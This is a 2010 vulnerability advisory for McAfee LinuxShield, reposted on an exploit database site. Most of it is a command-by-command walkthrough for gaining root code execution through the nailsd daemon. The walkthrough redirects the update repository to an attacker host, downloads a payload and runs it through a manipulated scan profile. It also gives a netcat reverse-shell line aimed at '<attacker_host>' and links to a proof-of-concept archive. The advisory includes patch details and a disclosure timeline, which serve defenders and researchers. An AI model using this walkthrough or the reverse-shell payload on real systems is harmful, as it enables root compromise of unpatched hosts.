0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
McAfee LinuxShield remote/local Code Execution Vulnerability
[============================================================ McAfee LinuxShield remote/local Code Execution Vulnerability ============================================================ Title: McAfee LinuxShield remote/local code execution Severity: Medium Affected Products: McAfee LinuxShield <= 1.5.1 Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192 Remote Exploitable: Yes (attacker must be authenticated) Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Thanks to: Thierry Zoller: For the permission to use his Policy Background: =========== LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine ?�� the engine common to all our anti-virus products. Although a few years ago, the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows- based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it. When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software. LinuxShield scans files as they are opened and closed ?�� a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time. When kept up-to-date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible. LinuxShield uses a web-browser interface, and a large number of LinuxShield installations can be centrally controlled by ePolicy Orchestrator. (Product description from LinuxShield Product Guide) Description: ============ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of McAfee LinuxShield. User interaction is not required to exploit this vulnerability but an attacker must be authenticated. The LinuxShield Webinterface communicates with the localy installed "nailsd" daemon, which listens on port 65443/tcp, to do configuration changes, query the configuration and execute tasks. Each user, which can login to the victim box, can also authenticate it self to the "nailsd" and can do configuration changes and execute tasks with root privileges. A direct execution of commands is not possible, but it is possible to download and execute code through manipulation of the config and execute schedule tasks of the LinuxShield. walk-through (after the TLS handshake): +-------------------------------------- nailsd > +OK welcome to the NAILS Statistics Service attacker> auth <user> <pass> nailsd > +OK successful authentication # Set the Attacker repository to download our code from a httpd # (catalog.z) #--------------------------------------------------------------- attacker> db set 1 _table=repository status=1 siteList=<?xml version ="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteLi st" GlobalVersion="20030131003110" LocalVersion="20091209 161903" Type="Client"><SiteList Default="1" Name="SomeGU ID"><HttpSite Type="repository" Name="EvilRepo" Order="1 " Server="<attackerhost>:80" Enabled="1" Local="1"><Rela tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use rName></ UserName><Password Encrypted="0"/></HttpSite></SiteList></ ns:SiteLists> _cmd=update nailsd > +OK database changes buffered. # Execute task to set the attacker repository #--------------------------------------------------------------- attacker> task setsitelist nailsd > +OK setting sitelist from CMA. # Execute the default Update task to download the code #--------------------------------------------------------------- attacker> task nstart LinuxShield Update nailsd > +OK task LinuxShield Update starting # Create a Scan profile, which executes our code. The profiles are # not stored in the database. # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg #--------------------------------------------------------------- attacker> sconf ODS_99 begin nailsd > +OK 1260400888 # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path # where our earlier downloaded catalog.z file is stored. # (/opt/McAfee/cma/scratch/update/catalog.z) #--------------------------------------------------------------- attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles= true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild= 10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99 .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100 00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile. ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr ofile.ODS_99.filter.extensions.type=extension nailsd.profil e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99 .action.Default.secondary=Quarantine nailsd.profile.ODS_99. action.App.primary=Clean nailsd.profile.ODS_99.action.App.s econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa ss nailsd.profile.ODS_99.action.error=Block nailsd > +OK configuration changes buffered attacker> sconf ODS_99 commit 1260400888 nailsd > +OK configuration changes stored # Set a scan task with the manipulated profile to execute the code #--------------------------------------------------------------- attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t mp;exclude:false timetable=type=unscheduled taskResults=0 i _lastRun=1260318482 status=Stopped _cmd=insert nailsd > +OK database changes buffered # Execute scan task to execute the code #--------------------------------------------------------------- attacker> task nstart Evil Task +-------------------------------------- walk-through EOF To get a reverse root shell place something like this in the catalog.z --- snip --- #!/bin/sh nc -nv <attacker_host> 4444 -e /bin/sh --- /snip --- Proof of Concept : ================== http://inj3ct0r.com/sploits/11165.tar.gz Solution: ========= McAfee Advisory +-------------- https://kc.mcafee.com/corporate/index?page=content&id=SB10007 Disclosure Timeline (YYYY/MM/DD): ================================= 2009.12.07: Vulnerability found 2010.02.03: Asked vendor for a PGP key 2010.02.05: Vendor sent his PGP key 2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2010.02.18) to Vendor 2010.02.05: Vendor acknowledges the reception of the advisory 2010.02.16: Ask for a status update, because the planned release date is 2010.02.18. 2010.02.16: Vendor response that, they are currently working on a patch 2010.02.17: Changed release date to 2010.02.25. 2010.02.22: Vendor gives a status update, that they are able to release the patch on 2010.02.25. 2010.02.24: Ask for a list of affected products and the advisory url. 2010.02.24: Vendor sends the list. 2010.03.02: Release of this Advisory # 0day.today [2024-11-15] #